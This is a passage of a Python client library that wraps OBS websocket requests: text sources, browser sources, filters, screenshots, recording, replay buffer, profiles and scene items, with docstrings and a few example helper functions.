def getGradient(self):
return self.datain['gradient']
def getGradient_color(self):
return self.datain['gradient_color']
def getGradient_dir(self):
return self.datain['gradient_dir']
def getGradient_opacity(self):
return self.datain['gradient_opacity']
def getOutline(self):
return self.datain['outline']
def getOutline_color(self):
return self.datain['outline_color']
def getOutline_size(self):
return self.datain['outline_size']
def getOutline_opacity(self):
return self.datain['outline_opacity']
def getText(self):
return self.datain['text']
def getValign(self):
return self.datain['valign']
def getVertical(self):
return self.datain['vertical']
class SetTextGDIPlusProperties(Baserequests):
"""Set the current properties of a Text GDI Plus source.
:Arguments:
*source*
type: String
Name of the source.
*align*
type: String (optional)
Text Alignment ("left", "center", "right").
*bk_color*
type: int (optional)
Background color.
*bk_opacity*
type: int (optional)
Background opacity (0-100).
*chatlog*
type: boolean (optional)
Chat log.
*chatlog_lines*
type: int (optional)
Chat log lines.
*color*
type: int (optional)
Text color.
*extents*
type: boolean (optional)
Extents wrap.
*extents_cx*
type: int (optional)
Extents cx.
*extents_cy*
type: int (optional)
Extents cy.
*file*
type: String (optional)
File path name.
*read_from_file*
type: boolean (optional)
Read text from the specified file.
*font*
type: Object (optional)
Holds data for the font. Ex: `"font": { "face": "Arial", "flags": 0, "size": 150, "style": "" }`
*font.face*
type: String (optional)
Font face.
*font.flags*
type: int (optional)
Font text styling flag. `Bold=1, Italic=2, Bold Italic=3, Underline=5, Strikeout=8`
*font.size*
type: int (optional)
Font text size.
*font.style*
type: String (optional)
Font Style (unknown function).
*gradient*
type: boolean (optional)
Gradient enabled.
*gradient_color*
type: int (optional)
Gradient color.
*gradient_dir*
type: float (optional)
Gradient direction.
*gradient_opacity*
type: int (optional)
Gradient opacity (0-100).
*outline*
type: boolean (optional)
Outline.
*outline_color*
type: int (optional)
Outline color.
*outline_size*
type: int (optional)
Outline size.
*outline_opacity*
type: int (optional)
Outline opacity (0-100).
*text*
type: String (optional)
Text content to be displayed.
*valign*
type: String (optional)
Text vertical alignment ("top", "center", "bottom").
*vertical*
type: boolean (optional)
Vertical text enabled.
*render*
type: boolean (optional)
Visibility of the scene item.
"""
def __init__(self, source, align=None, bk_color=None, bk_opacity=None, chatlog=None, chatlog_lines=None, color=None, extents=None, extents_cx=None, extents_cy=None, file=None, read_from_file=None, font=None, gradient=None, gradient_color=None, gradient_dir=None, gradient_opacity=None, outline=None, outline_color=None, outline_size=None, outline_opacity=None, text=None, valign=None, vertical=None, render=None):
Baserequests.__init__(self)
self.name = 'SetTextGDIPlusProperties'
self.dataout['source'] = source
self.dataout['align'] = align
self.dataout['bk_color'] = bk_color
self.dataout['bk_opacity'] = bk_opacity
self.dataout['chatlog'] = chatlog
self.dataout['chatlog_lines'] = chatlog_lines
self.dataout['color'] = color
self.dataout['extents'] = extents
self.dataout['extents_cx'] = extents_cx
self.dataout['extents_cy'] = extents_cy
self.dataout['file'] = file
self.dataout['read_from_file'] = read_from_file
self.dataout['font'] = font
self.dataout['gradient'] = gradient
self.dataout['gradient_color'] = gradient_color
self.dataout['gradient_dir'] = gradient_dir
self.dataout['gradient_opacity'] = gradient_opacity
self.dataout['outline'] = outline
self.dataout['outline_color'] = outline_color
self.dataout['outline_size'] = outline_size
self.dataout['outline_opacity'] = outline_opacity
self.dataout['text'] = text
self.dataout['valign'] = valign
self.dataout['vertical'] = vertical
self.dataout['render'] = render
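# Illustrative sketch: update only the text and font of a Text GDI+ source.
# Unspecified properties keep their current values; the font object follows the
# shape documented in the docstring above. Assumes the external `ws` client.
def _example_update_gdiplus_text(ws, source_name, new_text):
    ws.call(SetTextGDIPlusProperties(
        source_name,
        text=new_text,
        font={"face": "Arial", "flags": 0, "size": 150, "style": ""},
    ))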
class GetTextFreetype2Properties(Baserequests):
"""Get the current properties of a Text Freetype 2 source.
:Arguments:
*source*
type: String
Source name.
:Returns:
*source*
type: String
Source name
*color1*
type: int
Gradient top color.
*color2*
type: int
Gradient bottom color.
*custom_width*
type: int
Custom width (0 to disable).
*drop_shadow*
type: boolean
Drop shadow.
*font*
type: Object
Holds data for the font. Ex: `"font": { "face": "Arial", "flags": 0, "size": 150, "style": "" }`
*font.face*
type: String
Font face.
*font.flags*
type: int
Font text styling flag. `Bold=1, Italic=2, Bold Italic=3, Underline=5, Strikeout=8`
*font.size*
type: int
Font text size.
*font.style*
type: String
Font Style (unknown function).
*from_file*
type: boolean
Read text from the specified file.
*log_mode*
type: boolean
Chat log.
*outline*
type: boolean
Outline.
*text*
type: String
Text content to be displayed.
*text_file*
type: String
File path.
*word_wrap*
type: boolean
Word wrap.
"""
def __init__(self, source):
Baserequests.__init__(self)
self.name = 'GetTextFreetype2Properties'
self.datain['source'] = None
self.datain['color1'] = None
self.datain['color2'] = None
self.datain['custom_width'] = None
self.datain['drop_shadow'] = None
self.datain['font'] = None
self.datain['from_file'] = None
self.datain['log_mode'] = None
self.datain['outline'] = None
self.datain['text'] = None
self.datain['text_file'] = None
self.datain['word_wrap'] = None
self.dataout['source'] = source
def getSource(self):
return self.datain['source']
def getColor1(self):
return self.datain['color1']
def getColor2(self):
return self.datain['color2']
def getCustom_width(self):
return self.datain['custom_width']
def getDrop_shadow(self):
return self.datain['drop_shadow']
def getFont(self):
return self.datain['font']
def getFrom_file(self):
return self.datain['from_file']
def getLog_mode(self):
return self.datain['log_mode']
def getOutline(self):
return self.datain['outline']
def getText(self):
return self.datain['text']
def getText_file(self):
return self.datain['text_file']
def getWord_wrap(self):
return self.datain['word_wrap']
class SetTextFreetype2Properties(Baserequests):
"""Set the current properties of a Text Freetype 2 source.
:Arguments:
*source*
type: String
Source name.
*color1*
type: int (optional)
Gradient top color.
*color2*
type: int (optional)
Gradient bottom color.
*custom_width*
type: int (optional)
Custom width (0 to disable).
*drop_shadow*
type: boolean (optional)
Drop shadow.
*font*
type: Object (optional)
Holds data for the font. Ex: `"font": { "face": "Arial", "flags": 0, "size": 150, "style": "" }`
*font.face*
type: String (optional)
Font face.
*font.flags*
type: int (optional)
Font text styling flag. `Bold=1, Italic=2, Bold Italic=3, Underline=5, Strikeout=8`
*font.size*
type: int (optional)
Font text size.
*font.style*
type: String (optional)
Font Style (unknown function).
*from_file*
type: boolean (optional)
Read text from the specified file.
*log_mode*
type: boolean (optional)
Chat log.
*outline*
type: boolean (optional)
Outline.
*text*
type: String (optional)
Text content to be displayed.
*text_file*
type: String (optional)
File path.
*word_wrap*
type: boolean (optional)
Word wrap.
"""
def __init__(self, source, color1=None, color2=None, custom_width=None, drop_shadow=None, font=None, from_file=None, log_mode=None, outline=None, text=None, text_file=None, word_wrap=None):
Baserequests.__init__(self)
self.name = 'SetTextFreetype2Properties'
self.dataout['source'] = source
self.dataout['color1'] = color1
self.dataout['color2'] = color2
self.dataout['custom_width'] = custom_width
self.dataout['drop_shadow'] = drop_shadow
self.dataout['font'] = font
self.dataout['from_file'] = from_file
self.dataout['log_mode'] = log_mode
self.dataout['outline'] = outline
self.dataout['text'] = text
self.dataout['text_file'] = text_file
self.dataout['word_wrap'] = word_wrap
class GetBrowserSourceProperties(Baserequests):
"""Get current properties for a Browser Source.
:Arguments:
*source*
type: String
Source name.
:Returns:
*source*
type: String
Source name.
*is_local_file*
type: boolean
Indicates that a local file is in use.
*local_file*
type: String
File path.
*url*
type: String
Url.
*css*
type: String
CSS to inject.
*width*
type: int
Width.
*height*
type: int
Height.
*fps*
type: int
Framerate.
*shutdown*
type: boolean
Indicates whether the source should be shut down when not visible.
"""
def __init__(self, source):
Baserequests.__init__(self)
self.name = 'GetBrowserSourceProperties'
self.datain['source'] = None
self.datain['is_local_file'] = None
self.datain['local_file'] = None
self.datain['url'] = None
self.datain['css'] = None
self.datain['width'] = None
self.datain['height'] = None
self.datain['fps'] = None
self.datain['shutdown'] = None
self.dataout['source'] = source
def getSource(self):
return self.datain['source']
def getIs_local_file(self):
return self.datain['is_local_file']
def getLocal_file(self):
return self.datain['local_file']
def getUrl(self):
return self.datain['url']
def getCss(self):
return self.datain['css']
def getWidth(self):
return self.datain['width']
def getHeight(self):
return self.datain['height']
def getFps(self):
return self.datain['fps']
def getShutdown(self):
return self.datain['shutdown']
class SetBrowserSourceProperties(Baserequests):
"""Set current properties for a Browser Source.
:Arguments:
*source*
type: String
Name of the source.
*is_local_file*
type: boolean (optional)
Indicates that a local file is in use.
*local_file*
type: String (optional)
File path.
*url*
type: String (optional)
Url.
*css*
type: String (optional)
CSS to inject.
*width*
type: int (optional)
Width.
*height*
type: int (optional)
Height.
*fps*
type: int (optional)
Framerate.
*shutdown*
type: boolean (optional)
Indicates whether the source should be shut down when not visible.
*render*
type: boolean (optional)
Visibility of the scene item.
"""
def __init__(self, source, is_local_file=None, local_file=None, url=None, css=None, width=None, height=None, fps=None, shutdown=None, render=None):
Baserequests.__init__(self)
self.name = 'SetBrowserSourceProperties'
self.dataout['source'] = source
self.dataout['is_local_file'] = is_local_file
self.dataout['local_file'] = local_file
self.dataout['url'] = url
self.dataout['css'] = css
self.dataout['width'] = width
self.dataout['height'] = height
self.dataout['fps'] = fps
self.dataout['shutdown'] = shutdown
self.dataout['render'] = render
class GetSpecialSources(Baserequests):
"""Get configured special sources like Desktop Audio and Mic/Aux sources.
:Returns:
*desktop_1*
type: String (optional)
Name of the first Desktop Audio capture source.
*desktop_2*
type: String (optional)
Name of the second Desktop Audio capture source.
*mic_1*
type: String (optional)
Name of the first Mic/Aux input source.
*mic_2*
type: String (optional)
Name of the second Mic/Aux input source.
*mic_3*
type: String (optional)
Name of the third Mic/Aux input source.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'GetSpecialSources'
self.datain['desktop-1'] = None
self.datain['desktop-2'] = None
self.datain['mic-1'] = None
self.datain['mic-2'] = None
self.datain['mic-3'] = None
def getDesktop1(self):
return self.datain['desktop-1']
def getDesktop2(self):
return self.datain['desktop-2']
def getMic1(self):
return self.datain['mic-1']
def getMic2(self):
return self.datain['mic-2']
def getMic3(self):
return self.datain['mic-3']
class GetSourceFilters(Baserequests):
"""List filters applied to a source
:Arguments:
*sourceName*
type: String
Source name
:Returns:
*filters*
type: Array<Object>
List of filters for the specified source
*filters.*.enabled*
type: Boolean
Filter status (enabled or not)
*filters.*.type*
type: String
Filter type
*filters.*.name*
type: String
Filter name
*filters.*.settings*
type: Object
Filter settings
"""
def __init__(self, sourceName):
Baserequests.__init__(self)
self.name = 'GetSourceFilters'
self.datain['filters'] = None
self.dataout['sourceName'] = sourceName
def getFilters(self):
return self.datain['filters']
class GetSourceFilterInfo(Baserequests):
"""List filters applied to a source
:Arguments:
*sourceName*
type: String
Source name
*filterName*
type: String
Source filter name
:Returns:
*enabled*
type: Boolean
Filter status (enabled or not)
*type*
type: String
Filter type
*name*
type: String
Filter name
*settings*
type: Object
Filter settings
"""
def __init__(self, sourceName, filterName):
Baserequests.__init__(self)
self.name = 'GetSourceFilterInfo'
self.datain['enabled'] = None
self.datain['type'] = None
self.datain['name'] = None
self.datain['settings'] = None
self.dataout['sourceName'] = sourceName
self.dataout['filterName'] = filterName
def getEnabled(self):
return self.datain['enabled']
def getType(self):
return self.datain['type']
def getName(self):
return self.datain['name']
def getSettings(self):
return self.datain['settings']
class AddFilterToSource(Baserequests):
"""Add a new filter to a source. Available source types along with their settings properties are available from `GetSourceTypesList`.
:Arguments:
*sourceName*
type: String
Name of the source on which the filter is added
*filterName*
type: String
Name of the new filter
*filterType*
type: String
Filter type
*filterSettings*
type: Object
Filter settings
"""
def __init__(self, sourceName, filterName, filterType, filterSettings):
Baserequests.__init__(self)
self.name = 'AddFilterToSource'
self.dataout['sourceName'] = sourceName
self.dataout['filterName'] = filterName
self.dataout['filterType'] = filterType
self.dataout['filterSettings'] = filterSettings
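# Illustrative sketch: add a filter to a source and list the resulting filter chain.
# The filter type id 'color_filter' and its 'brightness' setting are assumptions for
# the example; real type ids and schemas come from GetSourceTypesList / OBS itself.
def _example_add_filter(ws, source_name):
    ws.call(AddFilterToSource(source_name, "example color", "color_filter",
                              {"brightness": 0.1}))
    return ws.call(GetSourceFilters(source_name)).getFilters()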
class RemoveFilterFromSource(Baserequests):
"""Remove a filter from a source
:Arguments:
*sourceName*
type: String
Name of the source from which the specified filter is removed
*filterName*
type: String
Name of the filter to remove
"""
def __init__(self, sourceName, filterName):
Baserequests.__init__(self)
self.name = 'RemoveFilterFromSource'
self.dataout['sourceName'] = sourceName
self.dataout['filterName'] = filterName
class ReorderSourceFilter(Baserequests):
"""Move a filter in the chain (absolute index positioning)
:Arguments:
*sourceName*
type: String
Name of the source to which the filter belongs
*filterName*
type: String
Name of the filter to reorder
*newIndex*
type: Integer
Desired position of the filter in the chain
"""
def __init__(self, sourceName, filterName, newIndex):
Baserequests.__init__(self)
self.name = 'ReorderSourceFilter'
self.dataout['sourceName'] = sourceName
self.dataout['filterName'] = filterName
self.dataout['newIndex'] = newIndex
class MoveSourceFilter(Baserequests):
"""Move a filter in the chain (relative positioning)
:Arguments:
*sourceName*
type: String
Name of the source to which the filter belongs
*filterName*
type: String
Name of the filter to reorder
*movementType*
type: String
How to move the filter around in the source's filter chain. Either "up", "down", "top" or "bottom".
"""
def __init__(self, sourceName, filterName, movementType):
Baserequests.__init__(self)
self.name = 'MoveSourceFilter'
self.dataout['sourceName'] = sourceName
self.dataout['filterName'] = filterName
self.dataout['movementType'] = movementType
class SetSourceFilterSettings(Baserequests):
"""Update settings of a filter
:Arguments:
*sourceName*
type: String
Name of the source to which the filter belongs
*filterName*
type: String
Name of the filter to reconfigure
*filterSettings*
type: Object
New settings. These will be merged into the current filter settings.
"""
def __init__(self, sourceName, filterName, filterSettings):
Baserequests.__init__(self)
self.name = 'SetSourceFilterSettings'
self.dataout['sourceName'] = sourceName
self.dataout['filterName'] = filterName
self.dataout['filterSettings'] = filterSettings
class SetSourceFilterVisibility(Baserequests):
"""Change the visibility/enabled state of a filter
:Arguments:
*sourceName*
type: String
Source name
*filterName*
type: String
Source filter name
*filterEnabled*
type: Boolean
New filter state
"""
def __init__(self, sourceName, filterName, filterEnabled):
Baserequests.__init__(self)
self.name = 'SetSourceFilterVisibility'
self.dataout['sourceName'] = sourceName
self.dataout['filterName'] = filterName
self.dataout['filterEnabled'] = filterEnabled
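# Illustrative sketch: push a filter to the top of its source's chain, then disable
# it without removing it. Assumes the external `ws` client described earlier.
def _example_filter_maintenance(ws, source_name, filter_name):
    ws.call(MoveSourceFilter(source_name, filter_name, "top"))
    ws.call(SetSourceFilterVisibility(source_name, filter_name, False))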
class GetAudioMonitorType(Baserequests):
"""Get the audio monitoring type of the specified source.
:Arguments:
*sourceName*
type: String
Source name.
:Returns:
*monitorType*
type: String
The monitor type in use. Options: `none`, `monitorOnly`, `monitorAndOutput`.
"""
def __init__(self, sourceName):
Baserequests.__init__(self)
self.name = 'GetAudioMonitorType'
self.datain['monitorType'] = None
self.dataout['sourceName'] = sourceName
def getMonitorType(self):
return self.datain['monitorType']
class SetAudioMonitorType(Baserequests):
"""Set the audio monitoring type of the specified source.
:Arguments:
*sourceName*
type: String
Source name.
*monitorType*
type: String
The monitor type to use. Options: `none`, `monitorOnly`, `monitorAndOutput`.
"""
def __init__(self, sourceName, monitorType):
Baserequests.__init__(self)
self.name = 'SetAudioMonitorType'
self.dataout['sourceName'] = sourceName
self.dataout['monitorType'] = monitorType
class TakeSourceScreenshot(Baserequests):
"""
At least `embedPictureFormat` or `saveToFilePath` must be specified.
Clients can specify `width` and `height` parameters to receive scaled pictures. Aspect ratio is
preserved if only one of these two parameters is specified.
:Arguments:
*sourceName*
type: String (optional)
Source name. Note that, since scenes are also sources, you can also provide a scene name. If not provided, the currently active scene is used.
*embedPictureFormat*
type: String (optional)
Format of the Data URI encoded picture. Can be "png", "jpg", "jpeg" or "bmp" (or any other value supported by Qt's Image module)
*saveToFilePath*
type: String (optional)
Full file path (file extension included) where the captured image is to be saved. Can be in a format different from `pictureFormat`. Can be a relative path.
*fileFormat*
type: String (optional)
Format to save the image file as (one of the values provided in the `supported-image-export-formats` response field of `GetVersion`). If not specified, tries to guess based on file extension.
*compressionQuality*
type: int (optional)
Compression ratio between -1 and 100 to write the image with. -1 is automatic, 1 is smallest file/most compression, 100 is largest file/least compression. Varies with image type.
*width*
type: int (optional)
Screenshot width. Defaults to the source's base width.
*height*
type: int (optional)
Screenshot height. Defaults to the source's base height.
:Returns:
*sourceName*
type: String
Source name
*img*
type: String
Image Data URI (if `embedPictureFormat` was specified in the request)
*imageFile*
type: String
Absolute path to the saved image file (if `saveToFilePath` was specified in the request)
"""
def __init__(self, sourceName=None, embedPictureFormat=None, saveToFilePath=None, fileFormat=None, compressionQuality=None, width=None, height=None):
Baserequests.__init__(self)
self.name = 'TakeSourceScreenshot'
self.datain['sourceName'] = None
self.datain['img'] = None
self.datain['imageFile'] = None
self.dataout['sourceName'] = sourceName
self.dataout['embedPictureFormat'] = embedPictureFormat
self.dataout['saveToFilePath'] = saveToFilePath
self.dataout['fileFormat'] = fileFormat
self.dataout['compressionQuality'] = compressionQuality
self.dataout['width'] = width
self.dataout['height'] = height
def getSourceName(self):
return self.datain['sourceName']
def getImg(self):
return self.datain['img']
def getImageFile(self):
return self.datain['imageFile']
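# Illustrative sketch: capture a source once as an embedded Data URI (scaled to a
# 1280 px width, height derived from the aspect ratio) and once to disk. The file
# path is an arbitrary example value; the `ws` client is assumed as before.
def _example_screenshot(ws, source_name):
    shot = ws.call(TakeSourceScreenshot(sourceName=source_name,
                                        embedPictureFormat="png",
                                        width=1280))
    data_uri = shot.getImg()  # "data:image/png;base64,..."
    ws.call(TakeSourceScreenshot(sourceName=source_name,
                                 saveToFilePath="/tmp/obs_screenshot.png"))
    return data_uri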
class ListOutputs(Baserequests):
"""List existing outputs
:Returns:
*outputs*
type: Array<Output>
Outputs list
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'ListOutputs'
self.datain['outputs'] = None
def getOutputs(self):
return self.datain['outputs']
class GetOutputInfo(Baserequests):
"""Get information about a single output
:Arguments:
*outputName*
type: String
Output name
:Returns:
*outputInfo*
type: Output
Output info
"""
def __init__(self, outputName):
Baserequests.__init__(self)
self.name = 'GetOutputInfo'
self.datain['outputInfo'] = None
self.dataout['outputName'] = outputName
def getOutputInfo(self):
return self.datain['outputInfo']
class StartOutput(Baserequests):
"""
Note: Controlling outputs is an experimental feature of obs-websocket. Some plugins which add outputs to OBS may not function properly when they are controlled in this way.
:Arguments:
*outputName*
type: String
Output name
"""
def __init__(self, outputName):
Baserequests.__init__(self)
self.name = 'StartOutput'
self.dataout['outputName'] = outputName
class StopOutput(Baserequests):
"""
Note: Controlling outputs is an experimental feature of obs-websocket. Some plugins which add outputs to OBS may not function properly when they are controlled in this way.
:Arguments:
*outputName*
type: String
Output name
*force*
type: boolean (optional)
Force stop (default: false)
"""
def __init__(self, outputName, force=None):
Baserequests.__init__(self)
self.name = 'StopOutput'
self.dataout['outputName'] = outputName
self.dataout['force'] = force
class SetCurrentProfile(Baserequests):
"""Set the currently active profile.
:Arguments:
*profile_name*
type: String
Name of the desired profile.
"""
def __init__(self, profile_name):
Baserequests.__init__(self)
self.name = 'SetCurrentProfile'
self.dataout['profile-name'] = profile_name
class GetCurrentProfile(Baserequests):
"""Get the name of the current profile.
:Returns:
*profile_name*
type: String
Name of the currently active profile.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'GetCurrentProfile'
self.datain['profile-name'] = None
def getProfileName(self):
return self.datain['profile-name']
class ListProfiles(Baserequests):
"""Get a list of available profiles.
:Returns:
*profiles*
type: Array<Object>
List of available profiles.
*profiles.*.profile_name*
type: String
Filter name
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'ListProfiles'
self.datain['profiles'] = None
def getProfiles(self):
return self.datain['profiles']
class GetRecordingStatus(Baserequests):
"""Get current recording status.
:Returns:
*isRecording*
type: boolean
Current recording status.
*isRecordingPaused*
type: boolean
Whether the recording is paused or not.
*recordTimecode*
type: String (optional)
Time elapsed since recording started (only present if currently recording).
*recordingFilename*
type: String (optional)
Absolute path to the recording file (only present if currently recording).
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'GetRecordingStatus'
self.datain['isRecording'] = None
self.datain['isRecordingPaused'] = None
self.datain['recordTimecode'] = None
self.datain['recordingFilename'] = None
def getIsRecording(self):
return self.datain['isRecording']
def getIsRecordingPaused(self):
return self.datain['isRecordingPaused']
def getRecordTimecode(self):
return self.datain['recordTimecode']
def getRecordingFilename(self):
return self.datain['recordingFilename']
class StartStopRecording(Baserequests):
"""Toggle recording on or off (depending on the current recording state).
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'StartStopRecording'
class StartRecording(Baserequests):
"""Start recording.
Will return an `error` if recording is already active.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'StartRecording'
class StopRecording(Baserequests):
"""Stop recording.
Will return an `error` if recording is not active.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'StopRecording'
class PauseRecording(Baserequests):
"""Pause the current recording.
Returns an error if recording is not active or already paused.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'PauseRecording'
class ResumeRecording(Baserequests):
"""Resume/unpause the current recording (if paused).
Returns an error if recording is not active or not paused.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'ResumeRecording'
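# Illustrative sketch: pause-aware recording control driven by GetRecordingStatus.
# Assumes the external `ws` client whose call() fills in `datain`.
def _example_recording_control(ws):
    status = ws.call(GetRecordingStatus())
    if not status.getIsRecording():
        ws.call(StartRecording())
    elif status.getIsRecordingPaused():
        ws.call(ResumeRecording())
    else:
        ws.call(PauseRecording())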
class SetRecordingFolder(Baserequests):
"""
Please note: if `SetRecordingFolder` is called while a recording is
in progress, the change won't be applied immediately and will be
effective on the next recording.
:Arguments:
*rec_folder*
type: String
Path of the recording folder.
"""
def __init__(self, rec_folder):
Baserequests.__init__(self)
self.name = 'SetRecordingFolder'
self.dataout['rec-folder'] = rec_folder
class GetRecordingFolder(Baserequests):
"""Get the path of the current recording folder.
:Returns:
*rec_folder*
type: String
Path of the recording folder.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'GetRecordingFolder'
self.datain['rec-folder'] = None
def getRecFolder(self):
return self.datain['rec-folder']
class GetReplayBufferStatus(Baserequests):
"""Get the status of the OBS replay buffer.
:Returns:
*isReplayBufferActive*
type: boolean
Current recording status.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'GetReplayBufferStatus'
self.datain['isReplayBufferActive'] = None
def getIsReplayBufferActive(self):
return self.datain['isReplayBufferActive']
class StartStopReplayBuffer(Baserequests):
"""Toggle the Replay Buffer on/off (depending on the current state of the replay buffer).
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'StartStopReplayBuffer'
class StartReplayBuffer(Baserequests):
"""Start recording into the Replay Buffer.
Will return an `error` if the Replay Buffer is already active or if the
"Save Replay Buffer" hotkey is not set in OBS' settings.
Setting this hotkey is mandatory, even when triggering saves only
through obs-websocket.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'StartReplayBuffer'
class StopReplayBuffer(Baserequests):
"""Stop recording into the Replay Buffer.
Will return an `error` if the Replay Buffer is not active.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'StopReplayBuffer'
class SaveReplayBuffer(Baserequests):
"""Flush and save the contents of the Replay Buffer to disk. This is
basically the same as triggering the "Save Replay Buffer" hotkey.
Will return an `error` if the Replay Buffer is not active.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'SaveReplayBuffer'
class SetCurrentSceneCollection(Baserequests):
"""Change the active scene collection.
:Arguments:
*sc_name*
type: String
Name of the desired scene collection.
"""
def __init__(self, sc_name):
Baserequests.__init__(self)
self.name = 'SetCurrentSceneCollection'
self.dataout['sc-name'] = sc_name
class GetCurrentSceneCollection(Baserequests):
"""Get the name of the current scene collection.
:Returns:
*sc_name*
type: String
Name of the currently active scene collection.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'GetCurrentSceneCollection'
self.datain['sc-name'] = None
def getScName(self):
return self.datain['sc-name']
class ListSceneCollections(Baserequests):
"""List available scene collections
:Returns:
*scene_collections*
type: Array<String>
Scene collections list
*scene_collections.*.sc_name*
type: String
Scene collection name
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'ListSceneCollections'
self.datain['scene-collections'] = None
def getSceneCollections(self):
return self.datain['scene-collections']
class GetSceneItemList(Baserequests):
"""Get a list of all scene items in a scene.
:Arguments:
*sceneName*
type: String (optional)
Name of the scene to get the list of scene items from. Defaults to the current scene if not specified.
:Returns:
*sceneName*
type: String
Name of the requested (or current) scene
*sceneItems*
type: Array<Object>
Array of scene items
*sceneItems.*.itemId*
type: int
Unique item id of the source item
*sceneItems.*.sourceKind*
type: String
ID of the scene item's source. For example `vlc_source` or `image_source`.
*sceneItems.*.sourceName*
type: String
Name of the scene item's source
*sceneItems.*.sourceType*
type: String
Type of the scene item's source. Either `input`, `group`, or `scene`
"""
def __init__(self, sceneName=None):
Baserequests.__init__(self)
self.name = 'GetSceneItemList'
self.datain['sceneName'] = None
self.datain['sceneItems'] = None
self.dataout['sceneName'] = sceneName
def getSceneName(self):
return self.datain['sceneName']
def getSceneItems(self):
return self.datain['sceneItems']
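# Illustrative sketch: enumerate the scene items of the current scene. Each entry of
# getSceneItems() is a dict with the keys documented above (itemId, sourceKind,
# sourceName, sourceType). Assumes the external `ws` client.
def _example_list_scene_items(ws):
    listing = ws.call(GetSceneItemList())
    for item in listing.getSceneItems():
        print(item['itemId'], item['sourceKind'], item['sourceName'])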
class GetSceneItemProperties(Baserequests):
"""Gets the scene specific properties of the specified source item.
Coordinates are relative to the item's parent (the scene or group it belongs to).
:Arguments:
*scene_name*
type: String (optional)
Name of the scene the scene item belongs to. Defaults to the current scene.
*item*
type: String | Object
Scene Item name (if this field is a string) or specification (if it is an object).
*item.name*
type: String (optional)
Scene Item name (if the `item` field is an object)
*item.id*
type: int (optional)
Scene Item ID (if the `item` field is an object)
:Returns:
*name*
type: String
Scene Item name.
*itemId*
type: int
Scene Item ID.
*position.x*
type: double
The x position of the source from the left.
*position.y*
type: double
The y position of the source from the top.
*position.alignment*
type: int
The point on the source that the item is manipulated from. The sum of 1=Left or 2=Right, and 4=Top or 8=Bottom, or omit to center on that axis.
*rotation*
type: double
The clockwise rotation of the item in degrees around the point of alignment.
*scale.x*
type: double
The x-scale factor of the source.
*scale.y*
type: double
The y-scale factor of the source.
*crop.top*
type: int
The number of pixels cropped off the top of the source before scaling.
*crop.right*
type: int
The number of pixels cropped off the right of the source before scaling.
*crop.bottom*
type: int
The number of pixels cropped off the bottom of the source before scaling.
*crop.left*
type: int
The number of pixels cropped off the left of the source before scaling.
*visible*
type: bool
If the source is visible.
*muted*
type: bool
If the source is muted.
*locked*
type: bool
If the source's transform is locked.
*bounds.type*
type: String
Type of bounding box. Can be "OBS_BOUNDS_STRETCH", "OBS_BOUNDS_SCALE_INNER", "OBS_BOUNDS_SCALE_OUTER", "OBS_BOUNDS_SCALE_TO_WIDTH", "OBS_BOUNDS_SCALE_TO_HEIGHT", "OBS_BOUNDS_MAX_ONLY" or "OBS_BOUNDS_NONE".
*bounds.alignment*
type: int
Alignment of the bounding box.
*bounds.x*
type: double
Width of the bounding box.
*bounds.y*
type: double
Height of the bounding box.
*sourceWidth*
type: int
Base width (without scaling) of the source
*sourceHeight*
type: int
Base height (without scaling) of the source
*width*
type: double
Scene item width (base source width multiplied by the horizontal scaling factor)
*height*
type: double
Scene item height (base source height multiplied by the vertical scaling factor)
*parentGroupName*
type: String (optional)
Name of the item's parent (if this item belongs to a group)
*groupChildren*
type: Array<SceneItemTransform> (optional)
List of children (if this item is a group)
"""
def __init__(self, item, scene_name=None):
Baserequests.__init__(self)
self.name = 'GetSceneItemProperties'
self.datain['name'] = None
self.datain['itemId'] = None
self.datain['position'] = None
self.datain['rotation'] = None
self.datain['scale'] = None
self.datain['crop'] = None
self.datain['visible'] = None
self.datain['muted'] = None
self.datain['locked'] = None
self.datain['bounds'] = None
self.datain['sourceWidth'] = None
self.datain['sourceHeight'] = None
self.datain['width'] = None
self.datain['height'] = None
self.datain['parentGroupName'] = None
self.datain['groupChildren'] = None
self.dataout['item'] = item
self.dataout['scene-name'] = scene_name
def getName(self):
return self.datain['name']
def getItemId(self):
return self.datain['itemId']
def getPosition(self):
return self.datain['position']
def getRotation(self):
return self.datain['rotation']
def getScale(self):
return self.datain['scale']
def getCrop(self):
return self.datain['crop']
def getVisible(self):
return self.datain['visible']
def getMuted(self):
return self.datain['muted']
def getLocked(self):
return self.datain['locked']
def getBounds(self):
return self.datain['bounds']
def getSourceWidth(self):
return self.datain['sourceWidth']
def getSourceHeight(self):
return self.datain['sourceHeight']
def getWidth(self):
return self.datain['width']
def getHeight(self):
return self.datain['height']
def getParentGroupName(self):
return self.datain['parentGroupName']
def getGroupChildren(self):
return self.datain['groupChildren']
class SetSceneItemProperties(Baserequests):
"""Sets the scene specific properties of a source. Unspecified properties will remain unchanged.
Coordinates are relative to the item's parent (the scene or group it belongs to).
:Arguments:
*scene_name*
type: String (optional)
Name of the scene the source item belongs to. Defaults to the current scene.
*item*
type: String | Object
Scene Item name (if this field is a string) or specification (if it is an object).
*item.name*
type: String (optional)
Scene Item name (if the `item` field is an object)
*item.id*
type: int (optional)
Scene Item ID (if the `item` field is an object)
*position.x*
type: double (optional)
The new x position of the source.
*position.y*
type: double (optional)
The new y position of the source.
*position.alignment*
type: int (optional)
The new alignment of the source.
*rotation*
type: double (optional)
The new clockwise rotation of the item in degrees.
*scale.x*
type: double (optional)
The new x scale of the item.
*scale.y*
type: double (optional)
The new y scale of the item.
*crop.top*
type: int (optional)
The new amount of pixels cropped off the top of the source before scaling.
*crop.bottom*
type: int (optional)
The new amount of pixels cropped off the bottom of the source before scaling.
